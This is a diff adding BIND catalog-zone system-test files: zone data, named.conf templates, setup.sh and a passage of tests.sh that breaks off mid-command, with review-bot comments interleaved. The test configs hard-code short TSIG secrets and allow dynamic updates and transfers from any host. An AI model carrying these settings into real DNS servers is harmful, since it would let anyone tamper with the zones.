+@ IN NS invalid.
diff --git a/bin/tests/system/catz/ns3/dom6.example.db b/bin/tests/system/catz/ns3/dom6.example.db
new file mode 100644
index 0000000..5779aaf
--- /dev/null
+++ b/bin/tests/system/catz/ns3/dom6.example.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 IN SOA . . 1 3600 3600 3600 3600
+@ IN NS invalid.
diff --git a/bin/tests/system/catz/ns3/named.conf.in b/bin/tests/system/catz/ns3/named.conf.in
new file mode 100644
index 0000000..7e6a8ae
--- /dev/null
+++ b/bin/tests/system/catz/ns3/named.conf.in
@@ -0,0 +1,57 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ allow-new-zones yes;
+ pid-file "named.pid";
+ provide-ixfr no;
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { fd92:7065:b8e:ffff::3; };
+ notify no;
+ recursion no;
+};
+
+zone "catalog2.example" {
+ type primary;
+ file "catalog2.example.db";
+ allow-transfer { any; };
+ allow-update { any; };
+ also-notify { 10.53.0.2; };
+ notify explicit;
+};
+
+zone "dom5.example" {
+ type primary;
+ file "dom5.example.db";
+ allow-transfer { any; };
+ allow-update { any; };
+ notify explicit;
+};
+
+zone "dom6.example" {
+ type primary;
+ file "dom6.example.db";
+ allow-transfer { any; };
+ allow-update { any; };
+ notify explicit;
+};
diff --git a/bin/tests/system/catz/ns4/catalog.example.db.in b/bin/tests/system/catz/ns4/catalog.example.db.in
new file mode 100644
index 0000000..a0bab0d
--- /dev/null
+++ b/bin/tests/system/catz/ns4/catalog.example.db.in
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 SOA . . 1 86400 3600 86400 3600
+@ 3600 IN NS invalid.
+version IN TXT "1"
diff --git a/bin/tests/system/catz/ns4/named.conf.in b/bin/tests/system/catz/ns4/named.conf.in
new file mode 100644
index 0000000..5f99308
--- /dev/null
+++ b/bin/tests/system/catz/ns4/named.conf.in
@@ -0,0 +1,55 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { fd92:7065:b8e:ffff::4; };
+ notify no;
+ notify-delay 0;
+ recursion no;
+ serial-query-rate 100;
+ ixfr-from-differences yes; // GL #3777
+
+ catalog-zones {
+ zone "catalog-self.example"
+ min-update-interval 1s
+ default-masters { 10.53.0.4; };
+ };
+};
+
+zone "catalog-self.example" {
+ type primary;
+ file "catalog-self.example.db";
+ notify explicit;
+};
+
+key tsig_key. {
+ secret "LSAnCU+Z";
+ algorithm @DEFAULT_HMAC@;
+};
+
+key next_key. {
+ secret "LaAnCU+Z";
+ algorithm @DEFAULT_HMAC@;
+};
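Review bot: The `secret` values of `tsig_key.` and `next_key.` at the end of ns4/named.conf.in are fixed eight-character base64 strings, i.e. six bytes of key material, committed in clear text with nothing marking them as fixtures. That is far too short to authenticate anything for real, so the file should say it is test-only, for example `// test-only TSIG keys: fixed, short secrets, not usable outside the system tests` above the first `key` statement. Nothing else in this hunk references either key, so a second comment naming where they are consumed would help; presumably they are matched by name against keys on the other test servers, which should be confirmed.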
diff --git a/bin/tests/system/catz/setup.sh b/bin/tests/system/catz/setup.sh
new file mode 100644
index 0000000..d8ea177
--- /dev/null
+++ b/bin/tests/system/catz/setup.sh
@@ -0,0 +1,30 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named1.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+
+cp -f ns1/catalog.example.db.in ns1/catalog1.example.db
+cp -f ns3/catalog.example.db.in ns3/catalog2.example.db
+cp -f ns1/catalog.example.db.in ns1/catalog3.example.db
+cp -f ns1/catalog.example.db.in ns1/catalog4.example.db
+cp -f ns4/catalog.example.db.in ns4/catalog-self.example.db
+
+mkdir -p ns2/zonedir
diff --git a/bin/tests/system/catz/tests.sh b/bin/tests/system/catz/tests.sh
new file mode 100644
index 0000000..69b3a57
--- /dev/null
+++ b/bin/tests/system/catz/tests.sh
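Review bot: catz/setup.sh never sets `set -e`, so a failing `copy_setports` or `cp -f` is ignored and the run continues with a partly generated set of named.conf and catalog zone files; tests.sh in the same directory does start with `set -e`. Adding `set -e` right after conf.sh is sourced would stop the setup at the first failed step, provided clean.sh exits zero on an already clean tree. The expansions in `. $SYSTEMTESTTOP/conf.sh` and `$SHELL clean.sh` are also unquoted, while tests.sh quotes the same path; `. "$SYSTEMTESTTOP/conf.sh"` would keep the two scripts consistent.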
@@ -0,0 +1,1915 @@ +#!/bin/sh -x + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +dig_with_opts() { + "$DIG" -p "${PORT}" "$@" +} + +rndccmd() ( + "$RNDC" -c "$SYSTEMTESTTOP/common/rndc.conf" -p "${CONTROLPORT}" -s "$@" +) + +_wait_for_message() ( + nextpartpeek "$1" > wait_for_message.$n + grep -F "$2" wait_for_message.$n >/dev/null +) + +wait_for_message() ( + retry_quiet 20 _wait_for_message "$@" +) + +_wait_for_rcode() ( + rcode="$1" + qtype="$2" + ns="$3" + qname="$4" + file="$5" + shift 5 + dig_with_opts "$ns" "$qtype" "$qname" "$@" >"$file" || return 1 + grep "status: $rcode" "$file" >/dev/null +) + +wait_for_rcode() ( + retry_quiet 10 _wait_for_rcode "$@" +) + +wait_for_soa() ( + wait_for_rcode NOERROR SOA "$@" +) + +wait_for_a() ( + wait_for_rcode NOERROR A "$@" +) + +wait_for_no_soa() { + wait_for_rcode REFUSED SOA "$@" +} + +_wait_for_zonefile() ( + # shellcheck disable=SC2234 + [ -f "$1" ] +) + +wait_for_zonefile() ( + retry_quiet 10 _wait_for_zonefile "$@" +) + +_wait_for_no_zonefile() ( + # shellcheck disable=SC2234 + [ ! -f "$1" ] +) + +wait_for_no_zonefile() ( + retry_quiet 10 _wait_for_no_zonefile "$@" +) + +status=0 +n=0 +########################################################################## +echo_i "Testing adding/removing of domain in catalog zone" +n=$((n+1)) +echo_i "checking that dom1.example. is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom1.example. 
dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "Adding a domain dom1.example. to primary via RNDC ($n)" +ret=0 +# enough initial content for IXFR response when TXT record is added below +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom1.example.db +echo "@ 3600 IN NS invalid." >> ns1/dom1.example.db +echo "foo 3600 IN TXT some content here" >> ns1/dom1.example.db +echo "bar 3600 IN TXT some content here" >> ns1/dom1.example.db +echo "xxx 3600 IN TXT some content here" >> ns1/dom1.example.db +echo "yyy 3600 IN TXT some content here" >> ns1/dom1.example.db +rndccmd 10.53.0.1 addzone dom1.example. '{ type primary; file "dom1.example.db"; allow-update { any; }; notify explicit; also-notify { 10.53.0.2; }; };' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom1.example. is now served by primary ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom1.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "Adding domain dom1.example. to catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add e721433b6160b450260d4f54b3ec8bab30cb3b83.zones.catalog1.example. 3600 IN PTR dom1.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom1.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom1.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom1.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom1.example. 
dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that zone-directory is populated ($n)" +ret=0 +wait_for_zonefile "ns2/zonedir/__catz___default_catalog1.example_dom1.example.db" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "update dom1.example. ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add dom1.example 0 IN TXT added record + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "wait for secondary to be updated ($n)" +ret=0 +wait_for_txt() { + dig_with_opts @10.53.0.2 TXT dom1.example. > dig.out.test$n || return 1 + grep "ANSWER: 1," dig.out.test$n > /dev/null || return 1 + grep "status: NOERROR" dig.out.test$n > /dev/null || return 1 + grep "IN.TXT." dig.out.test$n > /dev/null || return 1 +} +retry_quiet 10 wait_for_txt || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check that journal was created for cleanup test ($n)" +ret=0 +test -f ns2/zonedir/__catz___default_catalog1.example_dom1.example.db.jnl || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "update catalog zone serial ($n)" +ret=0 +# default minimum update rate is once / 5 seconds +sleep 5 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add catalog1.example 3600 SOA . . 20 86400 3600 86400 3600 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "wait for catalog zone to transfer ($n)" +ret=0 +wait_for_soa_equal_20() { + dig_with_opts @10.53.0.2 SOA catalog1.example. > dig.out.test$n || return 1 + grep "ANSWER: 1," dig.out.test$n > /dev/null || return 1 + grep "status: NOERROR" dig.out.test$n > /dev/null || return 1 + grep 'IN.SOA.\. \. 
20 ' dig.out.test$n > /dev/null || return 1 +} +retry_quiet 10 wait_for_soa_equal_20 || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "update dom1.example. again ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add foo.dom1.example 0 IN TXT added record + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "wait for secondary to be updated again ($n)" +ret=0 +wait_for_txt() { + dig_with_opts @10.53.0.2 TXT foo.dom1.example. > dig.out.test$n || return 1 + grep "ANSWER: 2," dig.out.test$n > /dev/null || return 1 + grep "status: NOERROR" dig.out.test$n > /dev/null || return 1 + grep "IN.TXT." dig.out.test$n > /dev/null || return 1 +} +retry_quiet 10 wait_for_txt || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing domain dom1.example. from catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete e721433b6160b450260d4f54b3ec8bab30cb3b83.zones.catalog1.example + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "zone_shutdown: zone dom1.example/IN: shutting down" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom1.example. is not served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom1.example. 
dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that zone-directory is emptied ($n)" +ret=0 +wait_for_no_zonefile "ns2/zonedir/__catz___default_catalog1.example_dom1.example.db" || ret=1 +wait_for_no_zonefile "ns2/zonedir/__catz___default_catalog1.example_dom1.example.db.jnl" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing various simple operations on domains, including using multiple catalog zones and garbage in zone" +n=$((n+1)) +echo_i "adding domain dom2.example. to primary via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom2.example.db +echo "@ IN NS invalid." >> ns1/dom2.example.db +rndccmd 10.53.0.1 addzone dom2.example. '{type primary; file "dom2.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "adding domain dom4.example. to primary via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom4.example.db +echo "@ IN NS invalid." >> ns1/dom4.example.db +rndccmd 10.53.0.1 addzone dom4.example. '{type primary; file "dom4.example.db";};' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "adding domains dom2.example, dom3.example. and some garbage to catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add 636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN PTR dom2.example. + update add b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN PTR dom3.example. + update add e721433b6160b450260d4f54b3ec8bab30cb3b83.zones.catalog1.example. 3600 IN NS foo.bar. + update add trash.catalog1.example. 3600 IN A 1.2.3.4 + update add trash2.foo.catalog1.example. 
3600 IN A 1.2.3.4 + update add trash3.zones.catalog1.example. 3600 IN NS a.dom2.example. + update add foobarbaz.b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN PTR dom3.example. + update add blahblah.636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN PTR dom2.example. + update add foobarbaz.b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN APL 1:1.2.3.4/30 + update add blahblah.636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN TXT "blah blah" + update add version.catalog1.example. 3600 IN A 1.2.3.4 + send + +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "adding domain dom4.example. to catalog2 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.3 ${PORT} + update add de26b88d855397a03f77ff1162fd055d8b419584.zones.catalog2.example. 3600 IN PTR dom4.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: updating catalog zone 'catalog2.example' with serial 2670950425" && +wait_for_message ns2/named.run "catz: adding zone 'dom2.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "catz: adding zone 'dom3.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "catz: adding zone 'dom4.example' from catalog 'catalog2.example'" && +wait_for_message ns2/named.run "transfer of 'dom4.example/IN' from 10.53.0.1#${EXTRAPORT1}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom4.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom4.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +n=$((n+1)) +echo_i "checking that dom3.example. 
is not served by primary ($n)" +ret=0 +wait_for_no_soa @10.53.0.1 dom3.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "adding a domain dom3.example. to primary via RNDC ($n)" +ret=0 +echo "@ 3600 IN SOA . . 1 3600 3600 3600 3600" > ns1/dom3.example.db +echo "@ IN NS invalid." >> ns1/dom3.example.db +rndccmd 10.53.0.1 addzone dom3.example. '{type primary; file "dom3.example.db"; also-notify { 10.53.0.2; }; notify explicit; };' || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom3.example. is served by primary ($n)" +ret=0 +wait_for_soa @10.53.0.1 dom3.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom2.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "catz: adding zone 'dom3.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom2.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" && +wait_for_message ns2/named.run "transfer of 'dom3.example/IN' from 10.53.0.1#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom3.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom3.example. 
dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +# GL #3060 +n=$((n+1)) +echo_i "reconfiguring secondary - checking if catz survives a certain class of failed reconfiguration attempts ($n)" +ret=0 +sed -e "s/^#T3//" < ns2/named1.conf.in > ns2/named.conf.tmp +copy_setports ns2/named.conf.tmp ns2/named.conf +$RNDC -c ../common/rndc.conf -s 10.53.0.2 -p "${CONTROLPORT}" reconfig > /dev/null 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking again that dom3.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom3.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "reconfiguring secondary - reverting the bad configuration ($n)" +ret=0 +copy_setports ns2/named1.conf.in ns2/named.conf +rndccmd 10.53.0.2 reconfig || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +# GL #3911 +n=$((n+1)) +echo_i "reconfiguring secondary - checking if catz survives another type of failed reconfiguration attempts ($n)" +ret=0 +sed -e "s/^#T4//" < ns2/named1.conf.in > ns2/named.conf.tmp +copy_setports ns2/named.conf.tmp ns2/named.conf +$RNDC -c ../common/rndc.conf -s 10.53.0.2 -p "${CONTROLPORT}" reconfig > /dev/null 2>&1 && ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# catalog zone update can be deferred +sleep 2 + +n=$((n+1)) +echo_i "checking again that dom3.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom3.example. 
dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "reconfiguring secondary - reverting the bad configuration ($n)" +ret=0 +copy_setports ns2/named1.conf.in ns2/named.conf +rndccmd 10.53.0.2 reconfig || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "removing all records from catalog1 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete 636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN PTR dom2.example. + update delete b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN PTR dom3.example. + update delete e721433b6160b450260d4f54b3ec8bab30cb3b83.zones.catalog1.example. 3600 IN NS foo.bar. + update delete trash.catalog1.example. 3600 IN A 1.2.3.4 + update delete trash2.foo.catalog1.example. 3600 IN A 1.2.3.4 + update delete trash3.zones.catalog1.example. 3600 IN NS a.dom2.example. + update delete foobarbaz.b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN PTR dom3.example. + update delete blahblah.636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN PTR dom2.example. + update delete foobarbaz.b901f492f3ebf6c1e5b597e51766f02f0479eb03.zones.catalog1.example. 3600 IN APL 1:1.2.3.4/30 + update delete blahblah.636722929740e507aaf27c502812fc395d30fb17.zones.catalog1.example. 3600 IN TXT "blah blah" + update delete version.catalog1.example. 3600 IN A 1.2.3.4 + send + +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing all records from catalog2 zone ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.3 ${PORT} + update delete de26b88d855397a03f77ff1162fd055d8b419584.zones.catalog2.example. 3600 IN PTR dom4.example. 
+ send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +########################################################################## +echo_i "Testing masters suboption and random labels" +n=$((n+1)) +echo_i "adding dom5.example. with a valid masters suboption (IP without TSIG) and a random label ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add somerandomlabel.zones.catalog1.example. 3600 IN PTR dom5.example. + update add masters.somerandomlabel.zones.catalog1.example. 3600 IN A 10.53.0.3 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom5.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom5.example/IN' from 10.53.0.3#${PORT}: Transfer status: success" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom5.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom5.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing dom5.example. ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete somerandomlabel.zones.catalog1.example. 3600 IN PTR dom5.example. + update delete masters.somerandomlabel.zones.catalog1.example. 3600 IN A 10.53.0.3 + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "zone_shutdown: zone dom5.example/IN: shutting down" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom5.example. 
is no longer served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom5.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +########################################################################## +echo_i "Testing masters global option" +n=$((n+1)) +echo_i "adding dom6.example. and a valid global masters option (IP without TSIG) ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add masters.catalog1.example. 3600 IN A 10.53.0.3 + update add masters.catalog1.example. 3600 IN AAAA fd92:7065:b8e:ffff::3 + update add 4346f565b4d63ddb99e5d2497ff22d04e878e8f8.zones.catalog1.example. 3600 IN PTR dom6.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom6.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "transfer of 'dom6.example/IN' from " > /dev/null || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom6.example. is served by secondary ($n)" +ret=0 +wait_for_soa @10.53.0.2 dom6.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing dom6.example. ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete masters.catalog1.example. 3600 IN A 10.53.0.3 + update delete masters.catalog1.example. 3600 IN AAAA fd92:7065:b8e:ffff::3 + update delete 4346f565b4d63ddb99e5d2497ff22d04e878e8f8.zones.catalog1.example. 3600 IN PTR dom6.example. 
+ send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "zone_shutdown: zone dom6.example/IN: shutting down" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking that dom6.example. is no longer served by secondary ($n)" +ret=0 +wait_for_no_soa @10.53.0.2 dom6.example. dig.out.test$n || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns2/named.run >/dev/null + +n=$((n+1)) +echo_i "adding dom6.example. and an invalid global masters option (TSIG without IP) ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update add label1.masters.catalog1.example. 3600 IN TXT "tsig_key" + update add 4346f565b4d63ddb99e5d2497ff22d04e878e8f8.zones.catalog1.example. 3600 IN PTR dom6.example. + send +END +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "waiting for secondary to sync up ($n)" +ret=0 +wait_for_message ns2/named.run "catz: adding zone 'dom6.example' from catalog 'catalog1.example'" && +wait_for_message ns2/named.run "error \"failure\" while trying to generate config for zone \"dom6.example\"" || ret=1 +if [ $ret -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "removing dom6.example. ($n)" +ret=0 +$NSUPDATE -d <<END >> nsupdate.out.test$n 2>&1 || ret=1 + server 10.53.0.1 ${PORT} + update delete label1.masters.catalog1.example. 3600 IN TXT "tsig_key" + update delete 